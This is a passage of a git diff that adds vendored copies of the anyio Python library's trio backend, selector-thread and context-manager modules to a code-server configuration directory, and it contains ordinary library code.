1: + raise ValueError("maxfds must be a positive integer") + + fds = array.array("i") + await trio.lowlevel.checkpoint() + with self._receive_guard: + while True: + try: + message, ancdata, flags, addr = await self._trio_socket.recvmsg( + msglen, socket.CMSG_LEN(maxfds * fds.itemsize) + ) + except BaseException as exc: + self._convert_socket_error(exc) + else: + if not message and not ancdata: + raise EndOfStream + + break + + for cmsg_level, cmsg_type, cmsg_data in ancdata: + if cmsg_level != socket.SOL_SOCKET or cmsg_type != socket.SCM_RIGHTS: + raise RuntimeError( + f"Received unexpected ancillary data; message = {message!r}, " + f"cmsg_level = {cmsg_level}, cmsg_type = {cmsg_type}" + ) + + fds.frombytes(cmsg_data[: len(cmsg_data) - (len(cmsg_data) % fds.itemsize)]) + + return message, list(fds) + + async def send_fds(self, message: bytes, fds: Collection[int | IOBase]) -> None: + if not message: + raise ValueError("message must not be empty") + if not fds: + raise ValueError("fds must not be empty") + + filenos: list[int] = [] + for fd in fds: + if isinstance(fd, int): + filenos.append(fd) + elif isinstance(fd, IOBase): + filenos.append(fd.fileno()) + + fdarray = array.array("i", filenos) + await trio.lowlevel.checkpoint() + with self._send_guard: + while True: + try: + await self._trio_socket.sendmsg( + [message], + [ + ( + socket.SOL_SOCKET, + socket.SCM_RIGHTS, + fdarray, + ) + ], + ) + break + except BaseException as exc: + self._convert_socket_error(exc) + + +class TCPSocketListener(_TrioSocketMixin, abc.SocketListener): + def __init__(self, raw_socket: socket.socket): + super().__init__(trio.socket.from_stdlib_socket(raw_socket)) + self._accept_guard = ResourceGuard("accepting connections from") + + async def accept(self) -> SocketStream: + with self._accept_guard: + try: + trio_socket, _addr = await self._trio_socket.accept() + except BaseException as exc: + self._convert_socket_error(exc) + + trio_socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) + return SocketStream(trio_socket) + + +class UNIXSocketListener(_TrioSocketMixin, abc.SocketListener): + def __init__(self, raw_socket: socket.socket): + super().__init__(trio.socket.from_stdlib_socket(raw_socket)) + self._accept_guard = ResourceGuard("accepting connections from") + + async def accept(self) -> UNIXSocketStream: + with self._accept_guard: + try: + trio_socket, _addr = await self._trio_socket.accept() + except BaseException as exc: + self._convert_socket_error(exc) + + return UNIXSocketStream(trio_socket) + + +class UDPSocket(_TrioSocketMixin[IPSockAddrType], abc.UDPSocket): + def __init__(self, trio_socket: TrioSocketType) -> None: + super().__init__(trio_socket) + self._receive_guard = ResourceGuard("reading from") + self._send_guard = ResourceGuard("writing to") + + async def receive(self) -> tuple[bytes, IPSockAddrType]: + with self._receive_guard: + try: + data, addr = await self._trio_socket.recvfrom(65536) + return data, convert_ipv6_sockaddr(addr) + except BaseException as exc: + self._convert_socket_error(exc) + + async def send(self, item: UDPPacketType) -> None: + with self._send_guard: + try: + await self._trio_socket.sendto(*item) + except BaseException as exc: + self._convert_socket_error(exc) + + +class ConnectedUDPSocket(_TrioSocketMixin[IPSockAddrType], abc.ConnectedUDPSocket): + def __init__(self, trio_socket: TrioSocketType) -> None: + super().__init__(trio_socket) + self._receive_guard = ResourceGuard("reading from") + self._send_guard = ResourceGuard("writing to") + + async def receive(self) -> bytes: + with self._receive_guard: + try: + return await self._trio_socket.recv(65536) + except BaseException as exc: + self._convert_socket_error(exc) + + async def send(self, item: bytes) -> None: + with self._send_guard: + try: + await self._trio_socket.send(item) + except BaseException as exc: + self._convert_socket_error(exc) + + +class UNIXDatagramSocket(_TrioSocketMixin[str], abc.UNIXDatagramSocket): + def __init__(self, trio_socket: TrioSocketType) -> None: + super().__init__(trio_socket) + self._receive_guard = ResourceGuard("reading from") + self._send_guard = ResourceGuard("writing to") + + async def receive(self) -> UNIXDatagramPacketType: + with self._receive_guard: + try: + data, addr = await self._trio_socket.recvfrom(65536) + return data, addr + except BaseException as exc: + self._convert_socket_error(exc) + + async def send(self, item: UNIXDatagramPacketType) -> None: + with self._send_guard: + try: + await self._trio_socket.sendto(*item) + except BaseException as exc: + self._convert_socket_error(exc) + + +class ConnectedUNIXDatagramSocket( + _TrioSocketMixin[str], abc.ConnectedUNIXDatagramSocket +): + def __init__(self, trio_socket: TrioSocketType) -> None: + super().__init__(trio_socket) + self._receive_guard = ResourceGuard("reading from") + self._send_guard = ResourceGuard("writing to") + + async def receive(self) -> bytes: + with self._receive_guard: + try: + return await self._trio_socket.recv(65536) + except BaseException as exc: + self._convert_socket_error(exc) + + async def send(self, item: bytes) -> None: + with self._send_guard: + try: + await self._trio_socket.send(item) + except BaseException as exc: + self._convert_socket_error(exc) + + +# +# Synchronization +# + + +class Event(BaseEvent): + def __new__(cls) -> Event: + return object.__new__(cls) + + def __init__(self) -> None: + self.__original = trio.Event() + + def is_set(self) -> bool: + return self.__original.is_set() + + async def wait(self) -> None: + return await self.__original.wait() + + def statistics(self) -> EventStatistics: + orig_statistics = self.__original.statistics() + return EventStatistics(tasks_waiting=orig_statistics.tasks_waiting) + + def set(self) -> None: + self.__original.set() + + +class Lock(BaseLock): + def __new__(cls, *, fast_acquire: bool = False) -> Lock: + return object.__new__(cls) + + def __init__(self, *, fast_acquire: bool = False) -> None: + self._fast_acquire = fast_acquire + self.__original = trio.Lock() + + @staticmethod + def _convert_runtime_error_msg(exc: RuntimeError) -> None: + if exc.args == ("attempt to re-acquire an already held Lock",): + exc.args = ("Attempted to acquire an already held Lock",) + + async def acquire(self) -> None: + if not self._fast_acquire: + try: + await self.__original.acquire() + except RuntimeError as exc: + self._convert_runtime_error_msg(exc) + raise + + return + + # This is the "fast path" where we don't let other tasks run + await trio.lowlevel.checkpoint_if_cancelled() + try: + self.__original.acquire_nowait() + except trio.WouldBlock: + await self.__original._lot.park() + except RuntimeError as exc: + self._convert_runtime_error_msg(exc) + raise + + def acquire_nowait(self) -> None: + try: + self.__original.acquire_nowait() + except trio.WouldBlock: + raise WouldBlock from None + except RuntimeError as exc: + self._convert_runtime_error_msg(exc) + raise + + def locked(self) -> bool: + return self.__original.locked() + + def release(self) -> None: + self.__original.release() + + def statistics(self) -> LockStatistics: + orig_statistics = self.__original.statistics() + owner = TrioTaskInfo(orig_statistics.owner) if orig_statistics.owner else None + return LockStatistics( + orig_statistics.locked, owner, orig_statistics.tasks_waiting + ) + + +class Semaphore(BaseSemaphore): + def __new__( + cls, + initial_value: int, + *, + max_value: int | None = None, + fast_acquire: bool = False, + ) -> Semaphore: + return object.__new__(cls) + + def __init__( + self, + initial_value: int, + *, + max_value: int | None = None, + fast_acquire: bool = False, + ) -> None: + super().__init__(initial_value, max_value=max_value, fast_acquire=fast_acquire) + self.__original = trio.Semaphore(initial_value, max_value=max_value) + + async def acquire(self) -> None: + if not self._fast_acquire: + await self.__original.acquire() + return + + # This is the "fast path" where we don't let other tasks run + await trio.lowlevel.checkpoint_if_cancelled() + try: + self.__original.acquire_nowait() + except trio.WouldBlock: + await self.__original._lot.park() + + def acquire_nowait(self) -> None: + try: + self.__original.acquire_nowait() + except trio.WouldBlock: + raise WouldBlock from None + + @property + def max_value(self) -> int | None: + return self.__original.max_value + + @property + def value(self) -> int: + return self.__original.value + + def release(self) -> None: + self.__original.release() + + def statistics(self) -> SemaphoreStatistics: + orig_statistics = self.__original.statistics() + return SemaphoreStatistics(orig_statistics.tasks_waiting) + + +class CapacityLimiter(BaseCapacityLimiter): + def __new__( + cls, + total_tokens: float | None = None, + *, + original: trio.CapacityLimiter | None = None, + ) -> CapacityLimiter: + return object.__new__(cls) + + def __init__( + self, + total_tokens: float | None = None, + *, + original: trio.CapacityLimiter | None = None, + ) -> None: + if original is not None: + self.__original = original + else: + assert total_tokens is not None + self.__original = trio.CapacityLimiter(total_tokens) + + async def __aenter__(self) -> None: + return await self.__original.__aenter__() + + async def __aexit__( + self, + exc_type: type[BaseException] | None, + exc_val: BaseException | None, + exc_tb: TracebackType | None, + ) -> None: + await self.__original.__aexit__(exc_type, exc_val, exc_tb) + + @property + def total_tokens(self) -> float: + return self.__original.total_tokens + + @total_tokens.setter + def total_tokens(self, value: float) -> None: + self.__original.total_tokens = value + + @property + def borrowed_tokens(self) -> int: + return self.__original.borrowed_tokens + + @property + def available_tokens(self) -> float: + return self.__original.available_tokens + + def acquire_nowait(self) -> None: + self.__original.acquire_nowait() + + def acquire_on_behalf_of_nowait(self, borrower: object) -> None: + self.__original.acquire_on_behalf_of_nowait(borrower) + + async def acquire(self) -> None: + await self.__original.acquire() + + async def acquire_on_behalf_of(self, borrower: object) -> None: + await self.__original.acquire_on_behalf_of(borrower) + + def release(self) -> None: + return self.__original.release() + + def release_on_behalf_of(self, borrower: object) -> None: + return self.__original.release_on_behalf_of(borrower) + + def statistics(self) -> CapacityLimiterStatistics: + orig = self.__original.statistics() + return CapacityLimiterStatistics( + borrowed_tokens=orig.borrowed_tokens, + total_tokens=orig.total_tokens, + borrowers=tuple(orig.borrowers), + tasks_waiting=orig.tasks_waiting, + ) + + +_capacity_limiter_wrapper: trio.lowlevel.RunVar = RunVar("_capacity_limiter_wrapper") + + +# +# Signal handling +# + + +class _SignalReceiver: + _iterator: AsyncIterator[int] + + def __init__(self, signals: tuple[Signals, ...]): + self._signals = signals + + def __enter__(self) -> _SignalReceiver: + self._cm = trio.open_signal_receiver(*self._signals) + self._iterator = self._cm.__enter__() + return self + + def __exit__( + self, + exc_type: type[BaseException] | None, + exc_val: BaseException | None, + exc_tb: TracebackType | None, + ) -> bool | None: + return self._cm.__exit__(exc_type, exc_val, exc_tb) + + def __aiter__(self) -> _SignalReceiver: + return self + + async def __anext__(self) -> Signals: + signum = await self._iterator.__anext__() + return Signals(signum) + + +# +# Testing and debugging +# + + +class TestRunner(abc.TestRunner): + def __init__(self, **options: Any) -> None: + from queue import Queue + + self._call_queue: Queue[Callable[[], object]] = Queue() + self._send_stream: MemoryObjectSendStream | None = None + self._options = options + + def __exit__( + self, + exc_type: type[BaseException] | None, + exc_val: BaseException | None, + exc_tb: types.TracebackType | None, + ) -> None: + if self._send_stream: + self._send_stream.close() + while self._send_stream is not None: + self._call_queue.get()() + + async def _run_tests_and_fixtures(self) -> None: + self._send_stream, receive_stream = create_memory_object_stream(1) + with receive_stream: + async for coro, outcome_holder in receive_stream: + try: + retval = await coro + except BaseException as exc: + outcome_holder.append(Error(exc)) + else: + outcome_holder.append(Value(retval)) + + def _main_task_finished(self, outcome: object) -> None: + self._send_stream = None + + def _call_in_runner_task( + self, + func: Callable[P, Awaitable[T_Retval]], + *args: P.args, + **kwargs: P.kwargs, + ) -> T_Retval: + if self._send_stream is None: + trio.lowlevel.start_guest_run( + self._run_tests_and_fixtures, + run_sync_soon_threadsafe=self._call_queue.put, + done_callback=self._main_task_finished, + **self._options, + ) + while self._send_stream is None: + self._call_queue.get()() + + outcome_holder: list[Outcome] = [] + self._send_stream.send_nowait((func(*args, **kwargs), outcome_holder)) + while not outcome_holder: + self._call_queue.get()() + + return outcome_holder[0].unwrap() + + def run_asyncgen_fixture( + self, + fixture_func: Callable[..., AsyncGenerator[T_Retval, Any]], + kwargs: dict[str, Any], + ) -> Iterable[T_Retval]: + asyncgen = fixture_func(**kwargs) + fixturevalue: T_Retval = self._call_in_runner_task(asyncgen.asend, None) + + yield fixturevalue + + try: + self._call_in_runner_task(asyncgen.asend, None) + except StopAsyncIteration: + pass + else: + self._call_in_runner_task(asyncgen.aclose) + raise RuntimeError("Async generator fixture did not stop") + + def run_fixture( + self, + fixture_func: Callable[..., Coroutine[Any, Any, T_Retval]], + kwargs: dict[str, Any], + ) -> T_Retval: + return self._call_in_runner_task(fixture_func, **kwargs) + + def run_test( + self, test_func: Callable[..., Coroutine[Any, Any, Any]], kwargs: dict[str, Any] + ) -> None: + self._call_in_runner_task(test_func, **kwargs) + + +class TrioTaskInfo(TaskInfo): + def __init__(self, task: trio.lowlevel.Task): + parent_id = None + if task.parent_nursery and task.parent_nursery.parent_task: + parent_id = id(task.parent_nursery.parent_task) + + super().__init__(id(task), parent_id, task.name, task.coro) + self._task = weakref.proxy(task) + + def has_pending_cancellation(self) -> bool: + try: + return self._task._cancel_status.effectively_cancelled + except ReferenceError: + # If the task is no longer around, it surely doesn't have a cancellation + # pending + return False + + +class TrioBackend(AsyncBackend): + @classmethod + def run( + cls, + func: Callable[[Unpack[PosArgsT]], Awaitable[T_Retval]], + args: tuple[Unpack[PosArgsT]], + kwargs: dict[str, Any], + options: dict[str, Any], + ) -> T_Retval: + return trio.run(func, *args) + + @classmethod + def current_token(cls) -> object: + return trio.lowlevel.current_trio_token() + + @classmethod + def current_time(cls) -> float: + return trio.current_time() + + @classmethod + def cancelled_exception_class(cls) -> type[BaseException]: + return trio.Cancelled + + @classmethod + async def checkpoint(cls) -> None: + await trio.lowlevel.checkpoint() + + @classmethod + async def checkpoint_if_cancelled(cls) -> None: + await trio.lowlevel.checkpoint_if_cancelled() + + @classmethod + async def cancel_shielded_checkpoint(cls) -> None: + await trio.lowlevel.cancel_shielded_checkpoint() + + @classmethod + async def sleep(cls, delay: float) -> None: + await trio.sleep(delay) + + @classmethod + def create_cancel_scope( + cls, *, deadline: float = math.inf, shield: bool = False + ) -> abc.CancelScope: + return CancelScope(deadline=deadline, shield=shield) + + @classmethod + def current_effective_deadline(cls) -> float: + return trio.current_effective_deadline() + + @classmethod + def create_task_group(cls) -> abc.TaskGroup: + return TaskGroup() + + @classmethod + def create_event(cls) -> abc.Event: + return Event() + + @classmethod + def create_lock(cls, *, fast_acquire: bool) -> Lock: + return Lock(fast_acquire=fast_acquire) + + @classmethod + def create_semaphore( + cls, + initial_value: int, + *, + max_value: int | None = None, + fast_acquire: bool = False, + ) -> abc.Semaphore: + return Semaphore(initial_value, max_value=max_value, fast_acquire=fast_acquire) + + @classmethod + def create_capacity_limiter(cls, total_tokens: float) -> CapacityLimiter: + return CapacityLimiter(total_tokens) + + @classmethod + async def run_sync_in_worker_thread( + cls, + func: Callable[[Unpack[PosArgsT]], T_Retval], + args: tuple[Unpack[PosArgsT]], + abandon_on_cancel: bool = False, + limiter: abc.CapacityLimiter | None = None, + ) -> T_Retval: + def wrapper() -> T_Retval: + with claim_worker_thread(TrioBackend, token): + return func(*args) + + token = TrioBackend.current_token() + return await run_sync( + wrapper, + abandon_on_cancel=abandon_on_cancel, + limiter=cast(trio.CapacityLimiter, limiter), + ) + + @classmethod + def check_cancelled(cls) -> None: + trio.from_thread.check_cancelled() + + @classmethod + def run_async_from_thread( + cls, + func: Callable[[Unpack[PosArgsT]], Awaitable[T_Retval]], + args: tuple[Unpack[PosArgsT]], + token: object, + ) -> T_Retval: + trio_token = cast("trio.lowlevel.TrioToken | None", token) + try: + return trio.from_thread.run(func, *args, trio_token=trio_token) + except trio.RunFinishedError: + raise RunFinishedError from None + + @classmethod + def run_sync_from_thread( + cls, + func: Callable[[Unpack[PosArgsT]], T_Retval], + args: tuple[Unpack[PosArgsT]], + token: object, + ) -> T_Retval: + trio_token = cast("trio.lowlevel.TrioToken | None", token) + try: + return trio.from_thread.run_sync(func, *args, trio_token=trio_token) + except trio.RunFinishedError: + raise RunFinishedError from None + + @classmethod + async def open_process( + cls, + command: StrOrBytesPath | Sequence[StrOrBytesPath], + *, + stdin: int | IO[Any] | None, + stdout: int | IO[Any] | None, + stderr: int | IO[Any] | None, + **kwargs: Any, + ) -> Process: + def convert_item(item: StrOrBytesPath) -> str: + str_or_bytes = os.fspath(item) + if isinstance(str_or_bytes, str): + return str_or_bytes + else: + return os.fsdecode(str_or_bytes) + + if isinstance(command, (str, bytes, PathLike)): + process = await trio.lowlevel.open_process( + convert_item(command), + stdin=stdin, + stdout=stdout, + stderr=stderr, + shell=True, + **kwargs, + ) + else: + process = await trio.lowlevel.open_process( + [convert_item(item) for item in command], + stdin=stdin, + stdout=stdout, + stderr=stderr, + shell=False, + **kwargs, + ) + + stdin_stream = SendStreamWrapper(process.stdin) if process.stdin else None + stdout_stream = ReceiveStreamWrapper(process.stdout) if process.stdout else None + stderr_stream = ReceiveStreamWrapper(process.stderr) if process.stderr else None + return Process(process, stdin_stream, stdout_stream, stderr_stream) + + @classmethod + def setup_process_pool_exit_at_shutdown(cls, workers: set[abc.Process]) -> None: + trio.lowlevel.spawn_system_task(_shutdown_process_pool, workers) + + @classmethod + async def connect_tcp( + cls, host: str, port: int, local_address: IPSockAddrType | None = None + ) -> SocketStream: + family = socket.AF_INET6 if ":" in host else socket.AF_INET + trio_socket = trio.socket.socket(family) + trio_socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) + if local_address: + await trio_socket.bind(local_address) + + try: + await trio_socket.connect((host, port)) + except BaseException: + trio_socket.close() + raise + + return SocketStream(trio_socket) + + @classmethod + async def connect_unix(cls, path: str | bytes) -> abc.UNIXSocketStream: + trio_socket = trio.socket.socket(socket.AF_UNIX) + try: + await trio_socket.connect(path) + except BaseException: + trio_socket.close() + raise + + return UNIXSocketStream(trio_socket) + + @classmethod + def create_tcp_listener(cls, sock: socket.socket) -> abc.SocketListener: + return TCPSocketListener(sock) + + @classmethod + def create_unix_listener(cls, sock: socket.socket) -> abc.SocketListener: + return UNIXSocketListener(sock) + + @classmethod + async def create_udp_socket( + cls, + family: socket.AddressFamily, + local_address: IPSockAddrType | None, + remote_address: IPSockAddrType | None, + reuse_port: bool, + ) -> UDPSocket | ConnectedUDPSocket: + trio_socket = trio.socket.socket(family=family, type=socket.SOCK_DGRAM) + + if reuse_port: + trio_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1) + + if local_address: + await trio_socket.bind(local_address) + + if remote_address: + await trio_socket.connect(remote_address) + return ConnectedUDPSocket(trio_socket) + else: + return UDPSocket(trio_socket) + + @classmethod + @overload + async def create_unix_datagram_socket( + cls, raw_socket: socket.socket, remote_path: None + ) -> abc.UNIXDatagramSocket: ... + + @classmethod + @overload + async def create_unix_datagram_socket( + cls, raw_socket: socket.socket, remote_path: str | bytes + ) -> abc.ConnectedUNIXDatagramSocket: ... + + @classmethod + async def create_unix_datagram_socket( + cls, raw_socket: socket.socket, remote_path: str | bytes | None + ) -> abc.UNIXDatagramSocket | abc.ConnectedUNIXDatagramSocket: + trio_socket = trio.socket.from_stdlib_socket(raw_socket) + + if remote_path: + await trio_socket.connect(remote_path) + return ConnectedUNIXDatagramSocket(trio_socket) + else: + return UNIXDatagramSocket(trio_socket) + + @classmethod + async def getaddrinfo( + cls, + host: bytes | str | None, + port: str | int | None, + *, + family: int | AddressFamily = 0, + type: int | SocketKind = 0, + proto: int = 0, + flags: int = 0, + ) -> Sequence[ + tuple[ + AddressFamily, + SocketKind, + int, + str, + tuple[str, int] | tuple[str, int, int, int] | tuple[int, bytes], + ] + ]: + return await trio.socket.getaddrinfo(host, port, family, type, proto, flags) + + @classmethod + async def getnameinfo( + cls, sockaddr: IPSockAddrType, flags: int = 0 + ) -> tuple[str, str]: + return await trio.socket.getnameinfo(sockaddr, flags) + + @classmethod + async def wait_readable(cls, obj: FileDescriptorLike) -> None: + try: + await wait_readable(obj) + except trio.ClosedResourceError as exc: + raise ClosedResourceError().with_traceback(exc.__traceback__) from None + except trio.BusyResourceError: + raise BusyResourceError("reading from") from None + + @classmethod + async def wait_writable(cls, obj: FileDescriptorLike) -> None: + try: + await wait_writable(obj) + except trio.ClosedResourceError as exc: + raise ClosedResourceError().with_traceback(exc.__traceback__) from None + except trio.BusyResourceError: + raise BusyResourceError("writing to") from None + + @classmethod + def notify_closing(cls, obj: FileDescriptorLike) -> None: + notify_closing(obj) + + @classmethod + async def wrap_listener_socket(cls, sock: socket.socket) -> abc.SocketListener: + return TCPSocketListener(sock) + + @classmethod + async def wrap_stream_socket(cls, sock: socket.socket) -> SocketStream: + trio_sock = trio.socket.from_stdlib_socket(sock) + return SocketStream(trio_sock) + + @classmethod + async def wrap_unix_stream_socket(cls, sock: socket.socket) -> UNIXSocketStream: + trio_sock = trio.socket.from_stdlib_socket(sock) + return UNIXSocketStream(trio_sock) + + @classmethod + async def wrap_udp_socket(cls, sock: socket.socket) -> UDPSocket: + trio_sock = trio.socket.from_stdlib_socket(sock) + return UDPSocket(trio_sock) + + @classmethod + async def wrap_connected_udp_socket(cls, sock: socket.socket) -> ConnectedUDPSocket: + trio_sock = trio.socket.from_stdlib_socket(sock) + return ConnectedUDPSocket(trio_sock) + + @classmethod + async def wrap_unix_datagram_socket(cls, sock: socket.socket) -> UNIXDatagramSocket: + trio_sock = trio.socket.from_stdlib_socket(sock) + return UNIXDatagramSocket(trio_sock) + + @classmethod + async def wrap_connected_unix_datagram_socket( + cls, sock: socket.socket + ) -> ConnectedUNIXDatagramSocket: + trio_sock = trio.socket.from_stdlib_socket(sock) + return ConnectedUNIXDatagramSocket(trio_sock) + + @classmethod + def current_default_thread_limiter(cls) -> CapacityLimiter: + try: + return _capacity_limiter_wrapper.get() + except LookupError: + limiter = CapacityLimiter( + original=trio.to_thread.current_default_thread_limiter() + ) + _capacity_limiter_wrapper.set(limiter) + return limiter + + @classmethod + def open_signal_receiver( + cls, *signals: Signals + ) -> AbstractContextManager[AsyncIterator[Signals]]: + return _SignalReceiver(signals) + + @classmethod + def get_current_task(cls) -> TaskInfo: + task = current_task() + return TrioTaskInfo(task) + + @classmethod + def get_running_tasks(cls) -> Sequence[TaskInfo]: + root_task = current_root_task() + assert root_task + task_infos = [TrioTaskInfo(root_task)] + nurseries = root_task.child_nurseries + while nurseries: + new_nurseries: list[trio.Nursery] = [] + for nursery in nurseries: + for task in nursery.child_tasks: + task_infos.append(TrioTaskInfo(task)) + new_nurseries.extend(task.child_nurseries) + + nurseries = new_nurseries + + return task_infos + + @classmethod + async def wait_all_tasks_blocked(cls) -> None: + from trio.testing import wait_all_tasks_blocked + + await wait_all_tasks_blocked() + + @classmethod + def create_test_runner(cls, options: dict[str, Any]) -> TestRunner: + return TestRunner(**options) + + +backend_class = TrioBackend diff --git a/code-server-config/.local/lib/python3.12/site-packages/anyio/_core/__init__.py b/code-server-config/.local/lib/python3.12/site-packages/anyio/_core/__init__.py new file mode 100755 index 0000000..e69de29 diff --git a/code-server-config/.local/lib/python3.12/site-packages/anyio/_core/_asyncio_selector_thread.py b/code-server-config/.local/lib/python3.12/site-packages/anyio/_core/_asyncio_selector_thread.py new file mode 100755 index 0000000..9f35bae --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/anyio/_core/_asyncio_selector_thread.py @@ -0,0 +1,167 @@ +from __future__ import annotations + +import asyncio +import socket +import threading +from collections.abc import Callable +from selectors import EVENT_READ, EVENT_WRITE, DefaultSelector +from typing import TYPE_CHECKING, Any + +if TYPE_CHECKING: + from _typeshed import FileDescriptorLike + +_selector_lock = threading.Lock() +_selector: Selector | None = None + + +class Selector: + def __init__(self) -> None: + self._thread = threading.Thread(target=self.run, name="AnyIO socket selector") + self._selector = DefaultSelector() + self._send, self._receive = socket.socketpair() + self._send.setblocking(False) + self._receive.setblocking(False) + # This somewhat reduces the amount of memory wasted queueing up data + # for wakeups. With these settings, maximum number of 1-byte sends + # before getting BlockingIOError: + # Linux 4.8: 6 + # macOS (darwin 15.5): 1 + # Windows 10: 525347 + # Windows you're weird. (And on Windows setting SNDBUF to 0 makes send + # blocking, even on non-blocking sockets, so don't do that.) + self._receive.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 1) + self._send.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 1) + # On Windows this is a TCP socket so this might matter. On other + # platforms this fails b/c AF_UNIX sockets aren't actually TCP. + try: + self._send.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) + except OSError: + pass + + self._selector.register(self._receive, EVENT_READ) + self._closed = False + + def start(self) -> None: + self._thread.start() + threading._register_atexit(self._stop) # type: ignore[attr-defined] + + def _stop(self) -> None: + global _selector + self._closed = True + self._notify_self() + self._send.close() + self._thread.join() + self._selector.unregister(self._receive) + self._receive.close() + self._selector.close() + _selector = None + assert not self._selector.get_map(), ( + "selector still has registered file descriptors after shutdown" + ) + + def _notify_self(self) -> None: + try: + self._send.send(b"\x00") + except BlockingIOError: + pass + + def add_reader(self, fd: FileDescriptorLike, callback: Callable[[], Any]) -> None: + loop = asyncio.get_running_loop() + try: + key = self._selector.get_key(fd) + except KeyError: + self._selector.register(fd, EVENT_READ, {EVENT_READ: (loop, callback)}) + else: + if EVENT_READ in key.data: + raise ValueError( + "this file descriptor is already registered for reading" + ) + + key.data[EVENT_READ] = loop, callback + self._selector.modify(fd, key.events | EVENT_READ, key.data) + + self._notify_self() + + def add_writer(self, fd: FileDescriptorLike, callback: Callable[[], Any]) -> None: + loop = asyncio.get_running_loop() + try: + key = self._selector.get_key(fd) + except KeyError: + self._selector.register(fd, EVENT_WRITE, {EVENT_WRITE: (loop, callback)}) + else: + if EVENT_WRITE in key.data: + raise ValueError( + "this file descriptor is already registered for writing" + ) + + key.data[EVENT_WRITE] = loop, callback + self._selector.modify(fd, key.events | EVENT_WRITE, key.data) + + self._notify_self() + + def remove_reader(self, fd: FileDescriptorLike) -> bool: + try: + key = self._selector.get_key(fd) + except KeyError: + return False + + if new_events := key.events ^ EVENT_READ: + del key.data[EVENT_READ] + self._selector.modify(fd, new_events, key.data) + else: + self._selector.unregister(fd) + + return True + + def remove_writer(self, fd: FileDescriptorLike) -> bool: + try: + key = self._selector.get_key(fd) + except KeyError: + return False + + if new_events := key.events ^ EVENT_WRITE: + del key.data[EVENT_WRITE] + self._selector.modify(fd, new_events, key.data) + else: + self._selector.unregister(fd) + + return True + + def run(self) -> None: + while not self._closed: + for key, events in self._selector.select(): + if key.fileobj is self._receive: + try: + while self._receive.recv(4096): + pass + except BlockingIOError: + pass + + continue + + if events & EVENT_READ: + loop, callback = key.data[EVENT_READ] + self.remove_reader(key.fd) + try: + loop.call_soon_threadsafe(callback) + except RuntimeError: + pass # the loop was already closed + + if events & EVENT_WRITE: + loop, callback = key.data[EVENT_WRITE] + self.remove_writer(key.fd) + try: + loop.call_soon_threadsafe(callback) + except RuntimeError: + pass # the loop was already closed + + +def get_selector() -> Selector: + global _selector + + with _selector_lock: + if _selector is None: + _selector = Selector() + _selector.start() + + return _selector diff --git a/code-server-config/.local/lib/python3.12/site-packages/anyio/_core/_contextmanagers.py b/code-server-config/.local/lib/python3.12/site-packages/anyio/_core/_contextmanagers.py new file mode 100755 index 0000000..302f32b --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/anyio/_core/_contextmanagers.py @@ -0,0 +1,200 @@ +from __future__ import annotations + +from abc import abstractmethod +from contextlib import AbstractAsyncContextManager, AbstractContextManager +from inspect import isasyncgen, iscoroutine, isgenerator +from types import TracebackType +from typing import Protocol, TypeVar, cast, final + +_T_co = TypeVar("_T_co", covariant=True) +_ExitT_co = TypeVar("_ExitT_co", covariant=True, bound="bool | None") + + +class _SupportsCtxMgr(Protocol[_T_co, _ExitT_co]): + def __contextmanager__(self) -> AbstractContextManager[_T_co, _ExitT_co]: ... + + +class _SupportsAsyncCtxMgr(Protocol[_T_co, _ExitT_co]): + def __asynccontextmanager__( + self, + ) -> AbstractAsyncContextManager[_T_co, _ExitT_co]: ... + + +class ContextManagerMixin: + """ + Mixin class providing context manager functionality via a generator-based + implementation. + + This class allows you to implement a context manager via :meth:`__contextmanager__` + which should return a generator. The mechanics are meant to mirror those of + :func:`@contextmanager `. + + .. note:: Classes using this mix-in are not reentrant as context managers, meaning + that once you enter it, you can't re-enter before first exiting it. + + .. seealso:: :doc:`contextmanagers` + """ + + __cm: AbstractContextManager[object, bool | None] | None = None + + @final + def __enter__(self: _SupportsCtxMgr[_T_co, bool | None]) -> _T_co: + # Needed for mypy to assume self still has the __cm member + assert isinstance(self, ContextManagerMixin) + if self.__cm is not None: + raise RuntimeError( + f"this {self.__class__.__qualname__} has already been entered" + ) + + cm = self.__contextmanager__() + if not isinstance(cm, AbstractContextManager): + if isgenerator(cm): + raise TypeError( + "__contextmanager__() returned a generator object instead of " + "a context manager. Did you forget to add the @contextmanager " + "decorator?" + ) + + raise TypeError( + f"__contextmanager__() did not return a context manager object, " + f"but {cm.__class__!r}" + ) + + if cm is self: + raise TypeError( + f"{self.__class__.__qualname__}.__contextmanager__() returned " + f"self. Did you forget to add the @contextmanager decorator and a " + f"'yield' statement?" + ) + + value = cm.__enter__() + self.__cm = cm + return value + + @final + def __exit__( + self: _SupportsCtxMgr[object, _ExitT_co], + exc_type: type[BaseException] | None, + exc_val: BaseException | None, + exc_tb: TracebackType | None, + ) -> _ExitT_co: + # Needed for mypy to assume self still has the __cm member + assert isinstance(self, ContextManagerMixin) + if self.__cm is None: + raise RuntimeError( + f"this {self.__class__.__qualname__} has not been entered yet" + ) + + # Prevent circular references + cm = self.__cm + del self.__cm + + return cast(_ExitT_co, cm.__exit__(exc_type, exc_val, exc_tb)) + + @abstractmethod + def __contextmanager__(self) -> AbstractContextManager[object, bool | None]: + """ + Implement your context manager logic here. + + This method **must** be decorated with + :func:`@contextmanager `. + + .. note:: Remember that the ``yield`` will raise any exception raised in the + enclosed context block, so use a ``finally:`` block to clean up resources! + + :return: a context manager object + """ + + +class AsyncContextManagerMixin: + """ + Mixin class providing async context manager functionality via a generator-based + implementation. + + This class allows you to implement a context manager via + :meth:`__asynccontextmanager__`. The mechanics are meant to mirror those of + :func:`@asynccontextmanager `. + + .. note:: Classes using this mix-in are not reentrant as context managers, meaning + that once you enter it, you can't re-enter before first exiting it. + + .. seealso:: :doc:`contextmanagers` + """ + + __cm: AbstractAsyncContextManager[object, bool | None] | None = None + + @final + async def __aenter__(self: _SupportsAsyncCtxMgr[_T_co, bool | None]) -> _T_co: + # Needed for mypy to assume self still has the __cm member + assert isinstance(self, AsyncContextManagerMixin) + if self.__cm is not None: + raise RuntimeError( + f"this {self.__class__.__qualname__} has already been entered" + ) + + cm = self.__asynccontextmanager__() + if not 